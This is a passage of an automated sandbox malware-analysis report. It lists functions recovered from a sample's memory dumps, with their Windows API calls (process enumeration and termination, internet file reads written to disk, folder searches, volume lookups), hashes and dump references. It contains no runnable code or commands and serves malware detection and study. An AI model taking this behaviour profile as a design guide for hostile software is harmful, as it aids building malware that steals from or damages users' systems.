WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040878C
CloseHandle.KERNEL32(00000000,?,00000400), ref: 004087B1
InternetCloseHandle.WININET(00000000), ref: 004087B8
InternetCloseHandle.WININET(?), ref: 004087C1

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$CrackCreateOpenReadWritelstrcpylstrlen
String ID:
API String ID: 3324746675-0
Opcode ID: 57e37dd70aee1b64da78086fa66d258c66e99df84f6a0c234287eb83fcdaefd4
Instruction ID: 29006633d65c6e203f8d5fdba3151149f46b1154e2f49980151adca0ed2b26b0
Opcode Fuzzy Hash: 57e37dd70aee1b64da78086fa66d258c66e99df84f6a0c234287eb83fcdaefd4
Instruction Fuzzy Hash: 2C41A6B59002099BDB10EF71CD85AEF7BB9EF84344F10402DF915A3191EF34AA4ACBA5

Function 008155A9 Relevance: 12.1, APIs: 8, Instructions: 52processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008155BF
Process32First.KERNEL32(00000000,?), ref: 008155C9
Process32Next.KERNEL32(00000000,?), ref: 008155D5
OpenProcess.KERNEL32(00000001,00000000,?), ref: 008155F9
TerminateProcess.KERNEL32(00000000,00000000), ref: 00815608
CloseHandle.KERNEL32(00000000), ref: 0081560F
Process32Next.KERNEL32(00000000,?), ref: 00815617
CloseHandle.KERNEL32(00000000), ref: 00815622

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 3836391474-0
Opcode ID: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
Instruction ID: 4f3784367ed104265f461e5cd21d6e9d07fe1383cd45608882f6a5f12f811150
Opcode Fuzzy Hash: 32374ddc62da0c9efc6679d4aff576bbbaf21c7cb326f5cef9821f99b737ff79
Instruction Fuzzy Hash: F101D479200A05ABE3201B60AC8AFFB77ADFF96785F041025F900D5180DF748D9086A5

Function 004127E8 Relevance: 11.6, APIs: 9, Instructions: 307COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?), ref: 004128C7
memmove.MSVCRT(?,?,?), ref: 0041293D
memmove.MSVCRT(?,?,?), ref: 0041297B
memcpy.MSVCRT(?,?,?), ref: 00412991
memmove.MSVCRT(?,?,00000000), ref: 004129E3
memmove.MSVCRT(?,00000000,?), ref: 00412A1B
memmove.MSVCRT(?,?,?), ref: 00412A6B
memmove.MSVCRT(?,?), ref: 00412ABA
memmove.MSVCRT(?,?,?), ref: 00412AE7

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memmove$memcpy
String ID:
API String ID: 3033661859-0
Opcode ID: de34b65fc7503c42e13109b3f3e82d58de50e4a04b5c11609258844348972ae1
Instruction ID: 2ac252bb25fc00d8f9626fb7efa383948f2b52263c374b358be136e1b8cb81eb
Opcode Fuzzy Hash: de34b65fc7503c42e13109b3f3e82d58de50e4a04b5c11609258844348972ae1
Instruction Fuzzy Hash: 88A1C1317043109BC7149E19DA8095BB7E6EFC4754F68483EF444DB311D6BAEC92CB9A

Function 00812A4F Relevance: 11.6, APIs: 9, Instructions: 307COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?), ref: 00812B2E
memmove.MSVCRT(?,?,?), ref: 00812BA4
memmove.MSVCRT(?,?,?), ref: 00812BE2
memcpy.MSVCRT(?,?,?), ref: 00812BF8
memmove.MSVCRT(?,?,00000000), ref: 00812C4A
memmove.MSVCRT(?,00000000,?), ref: 00812C82
memmove.MSVCRT(?,?,?), ref: 00812CD2
memmove.MSVCRT(?,?), ref: 00812D21
memmove.MSVCRT(?,?,?), ref: 00812D4E

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memmove$memcpy
String ID:
API String ID: 3033661859-0
Opcode ID: 7af7d1fd85c135fb44ad438f81dc935373bad9a349424fdd79d194c55280076f
Instruction ID: 911b104e30ef494b6bf8175b222085672c175f036b44c5f7b059bf93a3bb4e34
Opcode Fuzzy Hash: 7af7d1fd85c135fb44ad438f81dc935373bad9a349424fdd79d194c55280076f
Instruction Fuzzy Hash: 81A17C317053149BCB149A19D8809ABB7EAFFC8728F29492CF449DB311D671EC928BD2

Function 0080989F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144networkfileCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(00000000,?,00001000), ref: 00809975
InternetReadFile.WININET(00000000,?,00001000), ref: 0080999B
InternetCloseHandle.WININET(00000000), ref: 008099AD
InternetCloseHandle.WININET(19d), ref: 008099B7

Part of subcall function 00812631: memcpy.MSVCRT(?,008125B6,?,?,00000000,?,008125B6,?,?,008125EF,?,?,008125B6,?,?,?), ref: 0081267E

Strings

19d, xrefs: 008099B3

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandleRead$memcpy
String ID: 19d
API String ID: 1306965030-2662563406
Opcode ID: da3cd38ceaf56c841c6e601ce89e91c6084a4beed059c7463e3cd911340a452f
Instruction ID: a97317813fa4fc35c405dd04a5eea4111d0d711c279471cd8c710370df324950
Opcode Fuzzy Hash: da3cd38ceaf56c841c6e601ce89e91c6084a4beed059c7463e3cd911340a452f
Instruction Fuzzy Hash: D951EA34609390AAE7219F29DC557A67FE6FF96314F04260CF4C58A3D2EBF18588C752

Function 008088FC Relevance: 9.1, APIs: 6, Instructions: 120networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

Part of subcall function 00806E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,00806F0F,?,?,?,?), ref: 00806E7A
Part of subcall function 00806E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?), ref: 00806E86
Part of subcall function 00806E47: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,?), ref: 00806E92

StrCmpCA.SHLWAPI(?), ref: 00808962
InternetReadFile.WININET(00000000,?,00000400,?), ref: 008089D9
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 008089F3
CloseHandle.KERNEL32(00000000,?,00000400), ref: 00808A18
InternetCloseHandle.WININET(00000000), ref: 00808A1F
InternetCloseHandle.WININET(?), ref: 00808A28

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: CloseHandleInternet$File$ReadWritelstrcpy
String ID:
API String ID: 2640915698-0
Opcode ID: 74c3c51af933105cee16bb21461a7dd861a7cf3cd62c55685cf234fe47bb9288
Instruction ID: d335d958124f7eef1076c0a5366035e615a97629f40370c5fade4c9f8b0e2212
Opcode Fuzzy Hash: 74c3c51af933105cee16bb21461a7dd861a7cf3cd62c55685cf234fe47bb9288
Instruction Fuzzy Hash: 22418171A002599BCB10EF74DC86AEE7BB9FF45350F005119F945E3151EF309A8ACBA2

Function 008107F6 Relevance: 9.1, APIs: 6, Instructions: 103stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081083C
strchr.MSVCRT ref: 00810856
strchr.MSVCRT ref: 0081086E
lstrlen.KERNEL32(?), ref: 00810882
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081089A
strcpy_s.MSVCRT ref: 00810915

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrlenstrchr$HeapProcessstrcpy_s
String ID:
API String ID: 2110419323-0
Opcode ID: d83169153d75055110f27535443527958fce46b29760db2d90432ee4ea193c58
Instruction ID: cc736b7fc494a4a66a5fe17b5210ee57621a7b77066fae3c2f668ddb8d495108
Opcode Fuzzy Hash: d83169153d75055110f27535443527958fce46b29760db2d90432ee4ea193c58
Instruction Fuzzy Hash: 9E318D756043559FE700DF38AC84AABBBE9FF96340F004529F884D7352EB70DA958B62

Function 00813BFB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 117memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00813C17
GetVolumeInformationA.KERNEL32 ref: 00813C5E
GetProcessHeap.KERNEL32(?,?,?,?), ref: 00813C95
wsprintfA.USER32 ref: 00813CBF

Part of subcall function 00813975: lstrcpy.KERNEL32(00000000,?), ref: 00813999

Strings

C, xrefs: 00813C27

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: DirectoryHeapInformationProcessVolumeWindowslstrcpywsprintf
String ID: C
API String ID: 1921768340-1037565863
Opcode ID: 7ad6c88bac7b2b417639bc5adebd194043762363acf0846bb84d4a66be8a6070
Instruction ID: 71ccb08150c56e119f23669d53201625c3546bd4ecb4c5c5c93f084a7a5984cc
Opcode Fuzzy Hash: 7ad6c88bac7b2b417639bc5adebd194043762363acf0846bb84d4a66be8a6070
Instruction Fuzzy Hash: 4D412970908344ABD710AB389C46BAF7AAEFF82314F00641DF885D7252DF748E85C7A2

Function 00819CF4 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 276stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00814D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00814D7F

lstrcat.KERNEL32(?), ref: 00819D3E

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

Part of subcall function 0081986A: FindFirstFileA.KERNEL32(?,?), ref: 008198BC
Part of subcall function 0081986A: StrCmpCA.SHLWAPI(?,0042EEFC), ref: 008199A2
Part of subcall function 0081986A: PathMatchSpecA.SHLWAPI(?,?), ref: 00819A22

Part of subcall function 0081986A: lstrcat.KERNEL32(?,?), ref: 00819A48
Part of subcall function 0081986A: lstrcat.KERNEL32(?,?), ref: 00819A81
Part of subcall function 0081986A: lstrcat.KERNEL32(?,00644BCD), ref: 00819A89
Part of subcall function 0081986A: lstrcat.KERNEL32(?,?), ref: 00819A97

Part of subcall function 0081986A: FindNextFileA.KERNEL32(00000000,?), ref: 00819CB6

Part of subcall function 0081986A: FindClose.KERNEL32(00000000), ref: 00819CC5

Strings

(2c, xrefs: 00819D54
`2c, xrefs: 00819EE3
@2c, xrefs: 00819DDB
T2c, xrefs: 00819E5F

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcat$Find$FilePath$CloseFirstFolderMatchNextSpeclstrcpy
String ID: (2c$@2c$T2c$`2c
API String ID: 683699470-3460517010
Opcode ID: 40a6595c649b11bb180e860fb16e9663d2422a6314ab4a77bc593ff0e52c40fe
Instruction ID: 859b92f943ad0bacfe506d1b1c7dcb381bc9bd803b74d7c8e02bf8ad7a63400f
Opcode Fuzzy Hash: 40a6595c649b11bb180e860fb16e9663d2422a6314ab4a77bc593ff0e52c40fe
Instruction Fuzzy Hash: 80C17071D00B4A9BCB01DF79C9428E9F7B8FF59304B009619E95997A02EB30F6E5CB91

Function 0081A09B Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 245COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0081A0B5

Part of subcall function 00814D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00814D7F

memset.MSVCRT ref: 0081A202

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

memset.MSVCRT ref: 0081A324

Strings

hLd, xrefs: 0081A308
XLd, xrefs: 0081A2D1

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: memset$FolderPathlstrcpy
String ID: XLd$hLd
API String ID: 1363978202-3875103885
Opcode ID: 9a4ca41eec0fa1d7cc79818e71f743f84f5a572b4498b9dcc9f9fbeb1bbbc9b5
Instruction ID: 71ebcab840d1de1f274f916e6fdde8d297b15aa9e35b4edd77e155aa06ffc845
Opcode Fuzzy Hash: 9a4ca41eec0fa1d7cc79818e71f743f84f5a572b4498b9dcc9f9fbeb1bbbc9b5
Instruction Fuzzy Hash: 0AB1E434C01B899ADB01DF78DC83BE8BBB5FF5A304F046208E94566562DF70A6D8C792

Function 0080AA28 Relevance: 7.7, APIs: 5, Instructions: 238stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0080989F: InternetReadFile.WININET(00000000,?,00001000), ref: 00809975
Part of subcall function 0080989F: InternetReadFile.WININET(00000000,?,00001000), ref: 0080999B
Part of subcall function 0080989F: InternetCloseHandle.WININET(00000000), ref: 008099AD
Part of subcall function 0080989F: InternetCloseHandle.WININET(19d), ref: 008099B7

Part of subcall function 008129F5: strlen.MSVCRT ref: 00812A05
Part of subcall function 008129F5: memcmp.MSVCRT(?,?,00000000,?,?,?,?,0080AA4F,0042EEFC,?), ref: 00812A2C

memset.MSVCRT ref: 0080AAFC
??_U@YAPAXI@Z.MSVCRT(?,0042EEFC,?,?,00643A38), ref: 0080ABBB
memcpy.MSVCRT(00000000,?,?,0042EEFC,?,?,00643A38), ref: 0080ABD2
lstrcat.KERNEL32(?,?), ref: 0080AC3F
lstrcat.KERNEL32(?,?), ref: 0080AC6F

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandleReadlstrcat$memcmpmemcpymemsetstrlen
String ID:
API String ID: 1268544629-0
Opcode ID: b29940634fcf22564ac7d1ee818cb18731d4b81411fbf29b5e5a976fa2478ae7
Instruction ID: 7605a09d0c481267d59c01775cdbe9828d01bce9e8f13c45463bf30cafcb51c4
Opcode Fuzzy Hash: b29940634fcf22564ac7d1ee818cb18731d4b81411fbf29b5e5a976fa2478ae7
Instruction Fuzzy Hash: 4CA14A34900758ABDB10EF78DC81BAE7B7AFF56304F005518E4819B692DB74A6CACB52

Function 00813412 Relevance: 7.6, APIs: 5, Instructions: 138stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00813421
??_U@YAPAXI@Z.MSVCRT ref: 0081343F

Part of subcall function 00813239: strlen.MSVCRT ref: 00813245
Part of subcall function 00813239: strlen.MSVCRT ref: 00813309

memset.MSVCRT ref: 0081345E
VirtualQueryEx.KERNEL32(?,?,?,0000001C,?,?,00000000), ref: 0081349D
??_V@YAXPAX@Z.MSVCRT(00000000,?,?,00000000), ref: 00813596

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: strlen$QueryVirtualmemset
String ID:
API String ID: 3264498718-0
Opcode ID: 5cc64e3c8934bb9a3db4e7b4f6afa127b878f4d69c6ab6e7b030b3a716f9e9fb
Instruction ID: 0b2d69aca874396e3db9946b2c8a3a976b9f1a0cf5440349127f7c79ed482554
Opcode Fuzzy Hash: 5cc64e3c8934bb9a3db4e7b4f6afa127b878f4d69c6ab6e7b030b3a716f9e9fb
Instruction Fuzzy Hash: 5641BE71608304ABD718DE58DC85A6BB7EAFFD8B00F14892DF586C7350E635ED808B56

Function 008196D1 Relevance: 7.6, APIs: 6, Instructions: 129stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,?), ref: 0081971F

Part of subcall function 00814D47: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00814D7F

lstrcat.KERNEL32(?,?), ref: 00819756
lstrcat.KERNEL32(?,?), ref: 00819764
lstrcat.KERNEL32(?), ref: 00819771
lstrcat.KERNEL32(?,?), ref: 0081977B
lstrcat.KERNEL32(?), ref: 00819788

Part of subcall function 00813975: lstrcpy.KERNEL32(00000000,?), ref: 00813999

Part of subcall function 008139A7: lstrcpy.KERNEL32(00000000), ref: 008139CA

Part of subcall function 008192FC: GetProcessHeap.KERNEL32 ref: 0081930E
Part of subcall function 008192FC: FindFirstFileA.KERNEL32(?,?), ref: 0081936A

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$FileFindFirstFolderHeapPathProcess
String ID:
API String ID: 1841389222-0
Opcode ID: 012c3e621e2da63ea20026f09311a93b24641852794f56bc12d7c9dcc3b6d911
Instruction ID: 2fd11ede40e085544f82fbf31297fc37ac6c4d5ad65391cdbb33e81aae6c247c
Opcode Fuzzy Hash: 012c3e621e2da63ea20026f09311a93b24641852794f56bc12d7c9dcc3b6d911
Instruction Fuzzy Hash: 9541C872900655ABCB11EBA8DC46CEE77BDFF8A300B016519F64697012DB30B7C5CB92

Function 0041FB48 Relevance: 7.6, APIs: 5, Instructions: 100timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0041FB8B
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0041FBBC
GetLocalTime.KERNEL32(?), ref: 0041FBF0
SystemTimeToFileTime.KERNEL32(?,?), ref: 0041FC00
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041FC32

Part of subcall function 0041F76E: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F77F
Part of subcall function 0041F76E: GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041FBAC), ref: 0041F7C3
Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7DF
Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000002,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F7F9
Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F800
Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F810
Part of subcall function 0041F76E: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F835
Part of subcall function 0041F76E: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0041F849

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$Pointer$ReadTime$HandleInformationLocalSizeSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4216084854-0
Opcode ID: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
Instruction ID: aeb9a57c7c30a851f1939dbb9e5bce1d4e0d01877bf27b1033796e67ae6ef790
Opcode Fuzzy Hash: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
Instruction Fuzzy Hash: 7C31BDB1504744AFD714CB39C849AA7B7E8FF88704F404A3EF48AC6651E774E546CB20

Function 0081FDAF Relevance: 7.6, APIs: 5, Instructions: 100timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0081FDF2
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?), ref: 0081FE23
GetLocalTime.KERNEL32(?), ref: 0081FE57
SystemTimeToFileTime.KERNEL32(?,?), ref: 0081FE67
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0081FE99

Part of subcall function 0081F9D5: GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0081FE13), ref: 0081F9E6
Part of subcall function 0081F9D5: GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0081FE13), ref: 0081FA2A
Part of subcall function 0081F9D5: SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081FA46
Part of subcall function 0081F9D5: SetFilePointer.KERNEL32(?,00000024,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081FA67
Part of subcall function 0081F9D5: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081FA9C
Part of subcall function 0081F9D5: ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0081FAB0

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: File$Pointer$Time$HandleInformationLocalReadSizeSystemUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 4169386603-0
Opcode ID: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
Instruction ID: 6af24ea7d317c65143a8a84ca70a265db8f7902e468df51de046a64c06099770
Opcode Fuzzy Hash: 2705b3551fecf0ab8031dd1013c07c8e81eba1bc1388eac4c0d3141c3f617eac
Instruction Fuzzy Hash: 5C319CB1500745AFD714CB39C849AA7BBE8FF88304F404A3DF58ACA652E771E545CB20

Function 0041F988 Relevance: 7.6, APIs: 5, Instructions: 85fileCOMMON

Download Yara Rule

APIs

??_V@YAXPAX@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9AA
??_U@YAPAXI@Z.MSVCRT(?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9BC
memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041F9CD
memcpy.MSVCRT(?,?,?,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA11
WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001,?,?,00420362,?,00000001), ref: 0041FA2D

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
